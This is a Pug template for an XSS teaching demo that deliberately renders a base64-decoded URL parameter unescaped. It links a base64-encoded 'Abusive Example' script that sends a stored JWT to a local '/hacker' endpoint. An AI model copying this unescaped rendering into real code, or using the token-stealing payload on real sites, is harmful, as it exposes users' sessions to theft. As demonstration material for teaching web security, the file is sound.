extends ../common/layout.pug

block content
  script window.localStorage.setItem('jwtToken', 'verysecrettoken!')

  section.section
    .container
      h1.title.is-1 XSS Demo
      p.subtitle.is-1 URL Query Script Injection Example

      if flash
        .notification.is-danger
          h1.title.is-2 OMG! You hacked it!
          p.subtitle.is-2 !{Buffer.from(flash, 'base64')}
      else
        .notification.is-success
          h1.title.is-2 Aiaiaiaiai!
          p.subtitle.is-2 This page shows flash messages from the URL query, but it allows anything, even JavaScript!
          p
            |  There is one catch, however, to make the flash hackery work, the
            |  developer who made this had to base64 encode the flash message.
            |  He also liked that better. Nicely obfuscated. It looks cool, even:
            code  http://localhost:3030/unsafe-xss?flash=PHNjcmlwdD53aW5kb3cuYWxlcnQoJ0hlbGxvLCB3b3JsZCEnKTs8L3NjcmlwdD4=

      .content
        h1 Hack the flash
        p
          | Try to hack the
          code ?flash=base64-encoded-string
          |  URL query part to inject some script!

        p
          a(href="/unsafe-xss?flash=VGhpcyBpcyBhIGZsYXNoIG1lc3NhZ2Uh")
            strong Naive Example

        p
          a(href="/unsafe-xss?flash=PHNjcmlwdD53aW5kb3cuc2V0VGltZW91dChmdW5jdGlvbigpIHsgd2luZG93LmxvY2F0aW9uPSAnaHR0cDovL2xvY2FsaG9zdDozMDMwL2hhY2tlcj9qYXI9JyArIGxvY2FsU3RvcmFnZS5nZXRJdGVtKCdqd3RUb2tlbicpOyB9LCAxMDAwKTs8L3NjcmlwdD4=")
            strong Abusive Example
